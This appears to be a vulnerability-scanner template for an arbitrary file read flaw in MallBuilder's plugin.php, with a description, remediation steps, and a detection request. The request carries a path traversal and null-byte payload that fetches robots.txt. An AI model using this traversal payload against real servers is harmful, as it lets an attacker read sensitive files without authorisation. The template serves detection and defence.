id: Mallbuilder-pluginphp-FileRead
info:
  name: Mallbuilder plugin.php file read
  author:
  - l0ne1y
  description: |-
    Mallbuilder plugin.php arbitrary file read vulnerability
    MallBuilder is a multi-user online mall solution based on PHP+MYSQL. Using MallBuilder, one can quickly build a powerful online mall similar to JD, Tmall, or Yihaodian, or an enterprise, industry, localized, and vertical multi-user mall.

    MallBuilder has an arbitrary file read vulnerability. An attacker can exploit it to read the content of arbitrary files.
  severity: medium
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    http://www.mall-builder.com/

    Temporary Fix:
    1. Filter ".", preventing users from traversing to parent directories in the URL.
    2. Use strict regular-expression validation of user-input parameter formats. Hard-code or uniformly encode filename parameters passed by the user, use a whitelist for file types, and reject parameters containing malicious or null characters.
    3. Disable directory traversal services; for example, configure open_basedir in php.ini to restrict file access scope.
    4. Store file paths in the database and let users download files by submitting the corresponding file ID.
    5. Verify permissions before allowing a user to download a file.
requests:
- matchers:
  - type: word
    condition: and
    part: body
    words:
    - Disallow
    - User-agent
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/plugin.php?id=hux_wx:hux_wx&uid=1&mod=../../../..&ac=robots.txt%00'
  method: GET
